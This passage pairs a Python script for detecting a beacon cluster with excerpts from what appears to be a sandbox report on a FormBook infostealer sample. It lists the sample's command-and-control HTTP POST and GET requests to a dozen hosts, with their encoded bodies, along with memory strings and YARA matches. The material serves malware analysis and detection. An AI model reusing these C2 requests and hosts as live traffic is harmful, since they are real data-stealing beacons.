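# host -> form body, as shown in the report's POST entries (sent with IE11_UA)
POST_BODIES = {
    "www.cxyl968.com": "K8ePY=WvE92f2qgq9rhLnednbeKNK91W9waCqwAe0GjoxDaST8r0x6swngR-0M1L0A9qkWDDwVUrbyGlzHrJAIGfv1yKZFnt92rnRlw0(VJ_6mv_lpHq92yahkfkTGOWZwIMiP8QLAnWRfldrfl81ovvRoivdlEESC(ILKu9dOopHIkG8yX2H65_42OsvtgxR1bmQQHGgI~XG0EWDAsU(fFj0hrjbV9yOLJBgF3fbhutfZaBoG2szEBhYOgQzmi4cAvSKcP0oZtVZoFn3u2PpSshIfSVF7hmvkIyKAyh4KizCi9wBCJJ2ZwcTBiWd76qSrqNPIXqJgJI4OBDEGZ4eJDPwWOUtiLwHZMSqHrmcCUIKepIMc~coVVOUrg7hjMU9SGST6Wgxs8O2s6aGEIZIfnA).",
    "www.bestselfietools.com": "K8ePY=AsYtl-f-wKUBJK3I0rQj0WuHAUDrqSu1nC(FiwIPGvrMmnLvXKqZi5(WBuw-lvxchuI2YBch0CRE9E4pG6ujQ1jIgzOzdeRk0DVjtJH63-otE14Kos4_p0sHWIzImauOUTbk1OjCjXxnlviLiDqM~zdL(JDydrQOrU8Pb6tS1AxYSyx4PH7GzAnhxgcQ2Wodou7z5E6p3R(oy6geIdP-FibMQ0n0cw4eZFPcLNEXilgBsqOq460lY9r6lZksEPPcj17CNop9OEUr9qHB52thE6u8EeZac0imF5CFIiYymPid7YCzflxNuF3hxDhT3sOBnNaDACq7OH96LwbS5ftUliqcQYP2oB(vrywtHD6EcmLzmyokBWuyF7asnE9_Zm~bOWZg5EOuobZU0D1RgQ).",
}

# (method, host, target, user_agent, body); the NUL tails are the ones the report prints.
REQUESTS = (
    [("GET", h, t, None, b"\x00" * 7) for h, t in GET_TARGETS.items()]
    + [("POST", h, "/0tog/", IE11_UA, b.encode("ascii") + b"\x00" * 8) for h, b in POST_BODIES.items()]
)

STD_B64 = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")
URLSAFE_B64 = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_=")


def nonstandard_b64_alphabet(value):
    """Base64-looking value that uses characters outside both the standard and the
    URL-safe alphabet (in the POST bodies: '(', ')', '~', '.'), i.e. a custom encoding."""
    if not value:
        return False
    alnum_ratio = sum(c.isalnum() for c in value) / len(value)
    chars = set(value)
    return alnum_ratio > 0.85 and not (chars <= STD_B64 or chars <= URLSAFE_B64)


def parse_params(qs):
    """Split a query string or form body on & and = without percent-decoding it."""
    pairs = []
    for kv in qs.split("&"):
        if kv:
            name, _, value = kv.partition("=")
            pairs.append((name, value))
    return pairs


def request_params(method, target, body):
    if method == "GET":
        return parse_params(target.partition("?")[2])
    return parse_params(body.rstrip(b"\x00").decode("ascii", "replace"))


def summarize(requests, min_hosts=3):
    """Group requests by the traits that make this traffic look like one client."""
    hosts_by_path = defaultdict(set)
    hosts_by_const = defaultdict(set)   # (name, value) repeated verbatim across hosts
    custom_alphabet, nul_tail, no_ua = set(), set(), set()
    for method, host, target, ua, body in requests:
        hosts_by_path[target.partition("?")[0]].add(host)
        if body.endswith(b"\x00"):
            nul_tail.add(host)
        if ua is None:
            no_ua.add(host)
        for name, value in request_params(method, target, body):
            hosts_by_const[(name, value)].add(host)
            if nonstandard_b64_alphabet(value):
                custom_alphabet.add(host)
    return {
        "reused_paths": {p: sorted(h) for p, h in hosts_by_path.items() if len(h) >= min_hosts},
        "constant_params": {k: sorted(h) for k, h in hosts_by_const.items() if len(h) >= min_hosts},
        "custom_alphabet_hosts": sorted(custom_alphabet),
        "nul_tail_hosts": sorted(nul_tail),
        "no_user_agent_hosts": sorted(no_ua),
    }


def is_beacon_cluster(summary):
    """One path and one constant parameter shared by several unrelated hosts."""
    return bool(summary["reused_paths"]) and bool(summary["constant_params"])


if __name__ == "__main__":
    s = summarize(REQUESTS)
    for key, val in s.items():
        print(key, val)
    print("beacon cluster:", is_beacon_cluster(s))
```

Run over the report's traffic the summary returns one reused path (/0tog/, 12 hosts), one constant parameter (uTrL=ArghXbG, 12 hosts), a custom alphabet on both POST bodies, a NUL tail on every request and no User-Agent on all twelve GETs. Note the asymmetry the report's two signatures point at: the GETs are the requests "without a user agent", the POSTs carry the IE11 string, so a detection keyed on either header state alone sees only half of the session.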
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: POST /0tog/ HTTP/1.1 | Host: www.cxyl968.com | Connection: close | Content-Length: 411 | Cache-Control: no-cache | Origin: http://www.cxyl968.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.cxyl968.com/0tog/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: hex encoding of the Data Ascii line below, followed by 00 00 00 00 00 00 00 00 | Data Ascii:
K8ePY=WvE92f2qgq9rhLnednbeKNK91W9waCqwAe0GjoxDaST8r0x6swngR-0M1L0A9qkWDDwVUrbyGlzHrJAIGfv1yKZFnt92rnRlw0(VJ_6mv_lpHq92yahkfkTGOWZwIMiP8QLAnWRfldrfl81ovvRoivdlEESC(ILKu9dOopHIkG8yX2H65_42OsvtgxR1bmQQHGgI~XG0EWDAsU(fFj0hrjbV9yOLJBgF3fbhutfZaBoG2szEBhYOgQzmi4cAvSKcP0oZtVZoFn3u2PpSshIfSVF7hmvkIyKAyh4KizCi9wBCJJ2ZwcTBiWd76qSrqNPIXqJgJI4OBDEGZ4eJDPwWOUtiLwHZMSqHrmcCUIKepIMc~coVVOUrg7hjMU9SGST6Wgxs8O2s6aGEIZIfnA).
Source: global traffic | HTTP traffic detected: POST /0tog/ HTTP/1.1 | Host: www.bestselfietools.com | Connection: close | Content-Length: 411 | Cache-Control: no-cache | Origin: http://www.bestselfietools.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.bestselfietools.com/0tog/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: hex encoding of the Data Ascii line below, followed by 00 00 00 00 00 00 00 00 | Data Ascii:
K8ePY=AsYtl-f-wKUBJK3I0rQj0WuHAUDrqSu1nC(FiwIPGvrMmnLvXKqZi5(WBuw-lvxchuI2YBch0CRE9E4pG6ujQ1jIgzOzdeRk0DVjtJH63-otE14Kos4_p0sHWIzImauOUTbk1OjCjXxnlviLiDqM~zdL(JDydrQOrU8Pb6tS1AxYSyx4PH7GzAnhxgcQ2Wodou7z5E6p3R(oy6geIdP-FibMQ0n0cw4eZFPcLNEXilgBsqOq460lY9r6lZksEPPcj17CNop9OEUr9qHB52thE6u8EeZac0imF5CFIiYymPid7YCzflxNuF3hxDhT3sOBnNaDACq7OH96LwbS5ftUliqcQYP2oB(vrywtHD6EcmLzmyokBWuyF7asnE9_Zm~bOWZg5EOuobZU0D1RgQ).
Source: global traffic | HTTP traffic detected: POST /0tog/ HTTP/1.1 | Host: www.homecaredispatch.com | Connection: close | Content-Length: 411 | Cache-Control: no-cache | Origin: http://www.homecaredispatch.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.homecaredispatch.com/0tog/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: hex encoding of the Data Ascii line below, followed by 00 00 00 00 00 00 00 00 | Data Ascii:
K8ePY=7Fln5-GLMMGF~g3ZAiw39-LcMZUXh3Bi9mayctRoVMIrRLwjoDvHm469YDzO0J6AII5rkM2iFERRenw9xtVIDTAm0MxGwKnHXmUMruOj0A435Wrcl0FII90JEY4uJSig9WnB3PwF2ylXQJLbewI233QYKeOlz6~1Lx8Vjj0Cxrk_B60Vodh_VRq9ksTIdJtekOz4pFhsw3SRuijy(g6ro6iJzE1xwjgcKqylmA8n6Vxend~KqQa9Ca8mw0IUU9QClYQPb_bQ46qTKFHuTsq_1jSgKBqIYWBdq4XT1pXJDw2U1CRlG2Q0YkCCN-XwPvTmxk5dNcyZ(jOhRKMX~JAvsIr6YtIZo-cq~v6BjCEtisDqoZIgwrCmLQZM~orcNBml~-TbrTgDk-t5WixCmQ).
Source: global traffic | HTTP traffic detected: POST /0tog/ HTTP/1.1 | Host: www.netrworksoultions.com | Connection: close | Content-Length: 411 | Cache-Control: no-cache | Origin: http://www.netrworksoultions.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.netrworksoultions.com/0tog/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: hex encoding of the Data Ascii line below, followed by 00 00 00 00 00 00 00 00 | Data Ascii:
K8ePY=WyNoShgjoiwUJD61kUy_9t7gbwUN76tbEkqxpM~Sh2Ggj4gfUNDIrHwdgqfLq-1bJ0h6VvPQYD8HB2oQARtXgHCJTquhq5zONBYTvPu5tOXTl5e53DXbeX0QyOUINnj9(SsLpY5VtgmJyOQupjlZe7nGI7cAaUj_(MIuADNmnGOlNadwlUn6~z(-8FgeaxruRrJoH9eoGDaUou8drksBQOKllP02K5noxreJsjoPdBhuG_oP0BiFKxM1t6~PEl5D5PSD9RuUVlQ35WnKt-1WtXeoXYkz9GyD4-ASCaD_55yvBl7ytY9G~-ZONvaPNtwtG-cmm0j7zr5v~9mO6Kji97MwNIdreQ5dfAYtPgcLWa~fCmKwec(1boohVZfGkQpqdRUW0XdLQ9T6fWQUUw).
Source: global traffic | HTTP traffic detected: POST /0tog/ HTTP/1.1 | Host: www.splishysplashie.com | Connection: close | Content-Length: 411 | Cache-Control: no-cache | Origin: http://www.splishysplashie.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.splishysplashie.com/0tog/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: hex encoding of the Data Ascii line below, followed by 00 00 00 00 00 00 00 00 | Data Ascii:
K8ePY=XUp08RXWAsIQLMekIApiFIUCwmlRW5vtxWZLRCX7whA2tgNIKpNoKCHoVMUbVC23(Yqush7mEN~OAPHNECh4RuySDTNT6xy38TYtaZSDRfDh2xTRfUWddJf6ZU4nepYiRiBy9Y(9wj(swXMmZ-bc2dlOBjy6tDnBTw9nxgHT7qWOHY0_Yo~5n7lrQoPCgb3FgSic25LuDAtQ4m6Y6cjGssjLqZrzzg1XJSazxOiU47DLZofdjyX8BAumqCCxnChChBghZhEe6X3tC5RPtEC7TbQylzs7pT~fUF81wmtR(Cpis-5wtAM2EwkpoL4-IS4UC9yVXl1wyIlZACpPT5KGGbyUtFy1LKoxhiFQLXWOOFLkGSqcdZpFHZ6JML~j6i3ff_HhCx4qZKjX4AZbCA).
Source: global traffic | HTTP traffic detected: POST /0tog/ HTTP/1.1 | Host: www.ugpounds.info | Connection: close | Content-Length: 411 | Cache-Control: no-cache | Origin: http://www.ugpounds.info | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.ugpounds.info/0tog/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: hex encoding of the Data Ascii line below, followed by 00 00 00 00 00 00 00 00 | Data Ascii:
K8ePY=jxYhZn431rnpR-BI9V4DW5dQlNJe58l4mg~d3wMApIavr5aEyWL0jC0NIEVrnwVuye45nmf3CtbTEubhwYSF3zR7nxPi1RhT0iflHEJyQkF28wMlwSMt1AAw2tv7Br6qhPDpQ-E58R2Lt1~zT3efDBxeOCc0r_x0YG~Qj3rvyLH9U3fPn_YoeHzNw195P8QEleimwmIQjXFW0ZDDLMoxg84a(Wz9zfFkgLf-Ad7VtCm9j_rzL5omyIv6eG9UTPfXpMMY5YEVQvzJL9dPlWsO(tnT6Fc20QiO(Z4pjZhgbF7ZoUG2JxR9VoCti9KSBje8MgKFSMexB7BgOTqaHs0KN5KCeNAdFe1YUlj3MsV1sj08JKa-O-1Tet8oDKxIp-hoQM9u0EExMO(8VicujA).
Source: global traffic | HTTP traffic detected: POST /0tog/ HTTP/1.1 | Host: www.kuralike.com | Connection: close | Content-Length: 411 | Cache-Control: no-cache | Origin: http://www.kuralike.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.kuralike.com/0tog/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: hex encoding of the Data Ascii line below, followed by 00 00 00 00 00 00 00 00 | Data Ascii:
K8ePY=qHNScjs8WfJPfhZRv3fuaVRHDC9YXyFF(sMEkfypXD1aUG4XnnVPeJ(sB1uvI37KqIuTT-T2~yIH4b9GTfLIZimMD4APC1JKo8iva3HYYMaMOWz8MXj43TPIrC~riiSc9qUwwhLRY4t2g7DI4OHfRe5GC2davscna_Bzuk0Vkjp7Rb~i7-nU8i3s4M02TLl0Cp0eYsqqVgMpcDJflNzQ1zk4ky7H8G3i4Tps6vJ0dCfVit~evhdzdRsC1Sgpho0pDxLUCDNO97YjqVnFOfEESptIbZ7V9i8xXwXpM41ZrI5jnTyq8kzZHtwFNf9ZICxcKcqnsFcqjAW-3sSlrNeIo5TXpU7Wyp(5La(BCUSpdmnDQrp_ziiZDsduF9javC6pxYDDw0YzZcTI(xF1Nw).
Source: global traffic | HTTP traffic detected: POST /0tog/ HTTP/1.1 | Host: www.cdershoushichang.com | Connection: close | Content-Length: 411 | Cache-Control: no-cache | Origin: http://www.cdershoushichang.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.cdershoushichang.com/0tog/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: hex encoding of the Data Ascii line below, followed by 00 00 00 00 00 00 00 00 | Data Ascii:
K8ePY=7zu85-TIcI2acIG27371UtDFcF6yveZZa6O_BaFKC0L14ENNmUPrnr(bBRzqRP8I~4cffnT3RUeqiLBmXF9UDAPM6hQc3v9ConQ1ZfMIkmjd6w0BVXxyO8K_eqMU(BDsgxunZ36UP7i9vEpfFvlmjTzHkzpF9kEwWCH6HXbfi12xvIYt8JxRDTu7TxiEHUnX4M2CyJPb~rb79095tJRz41dFOb(qBquf2mSI4Qyrye1G(53jehIz5cGD67lg878bdjUMB_56itf575GfgdWio_~Hi1g5Y4xXgbrOT53mq6wFVyTXp109BALzCDeUWIy8T6HSA-HJtyjy5EQobFLg1KVnxAcr2Q9QJIGlvWxMrTss5qV7ieWK4Ks5mxNWp0xe5lwAVXtmLsnMHkj_qw).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.cakoi.xyzConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cakoi.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cakoi.xyz/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.davabeauty.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.davabeauty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.davabeauty.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.icfc-lr.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.icfc-lr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.icfc-lr.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=WAnq49OZtUlVoL/HnvBIdWMBLlOF4zZrZ69KoLBF6QuqfC3NtN9xH0oAOI3RR7LT9klu&uTrL=ArghXbG HTTP/1.1Host: www.smileyefero.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=ZtwHo4rcg6kY+oKBKGmDUJHc3TV2USuBeLhI4qVraQDetVBqj1irZ6xIt6IyyZwRRl8c&uTrL=ArghXbG HTTP/1.1Host: www.cxyl968.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=PusX7byL57M2YYa4nNlIjQSbI2y9oy+NyluH5iYGJdPErjOrRpjLqtGKatonovN7h70m&uTrL=ArghXbG HTTP/1.1Host: www.bestselfietools.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=0HRdnbOcFNnxvyqGcVRvrrLsbqQ9r15luAj7Zds+T+sucbkdrSSKiOrsMjTBx8eXU9lb&uTrL=ArghXbG HTTP/1.1Host: www.homecaredispatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=Zw5SMG8LqDk2YgvF1TbiqrHOLlMCwY9PXyT/3tCGwzSgj8pOa/e/s2Jc6JGsv8dePUVF&uTrL=ArghXbG HTTP/1.1Host: www.netrworksoultions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=YWdOi2HWMsssXNHLXFcnHd0z835yY7ryqR01DxX99DAAjRhjb58wIVulD8h5ehWU5+2Z&uTrL=ArghXbG HTTP/1.1Host: www.splishysplashie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=szsbHHEa8Z34Dvcr8ggFBf0+sO9O8s5D9HLjjzg3ltezu5OazjebzGlObkZU0CN2gu4p&uTrL=ArghXbG HTTP/1.1Host: www.ugpounds.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=lF5oCHYtU8NdNx0d23GGFix6DipSWwZzlMB9xev3ejNmYk0/3E8qaZy8VFiZaknF39Wz&uTrL=ArghXbG HTTP/1.1Host: www.kuralike.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=0xaGnbbnQYzuNYvkhy/sTqjZMVShuqNfLb/uaoFgDn+28nRXiEn9ntqddgr1RONYrtxd&uTrL=ArghXbG HTTP/1.1Host: www.cdershoushichang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=GF9usWOs6Zom8CUcoM9HTLdEnbH/87GB74cAi0EjR4aCsk9v8LlL6JBcR57llzuoSfvQ&uTrL=ArghXbG HTTP/1.1Host: www.cakoi.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=nfXISCjkjF7o09PEfrvvWtjdlx5A9d/AXTzo14C36Z6FZ6yyZM+c1gbaB/GDS9tLL8uG&uTrL=ArghXbG HTTP/1.1Host: www.davabeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=iyKGI9upEL4Yziuw+rqQi4DZsZrOo+I4mtWVwzFVTdhPpZPYbFAk464txuKcB7xLLFg9&uTrL=ArghXbG HTTP/1.1Host: www.icfc-lr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.smileyefero.com
          Source: unknownHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.cxyl968.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cxyl968.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cxyl968.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Frame-Options: SAMEORIGINDate: Wed, 16 Sep 2020 07:14:45 GMTConnection: closeContent-Length: 1163
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00420CC0 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0043DD3C GetKeyboardState,

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara matchFile source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
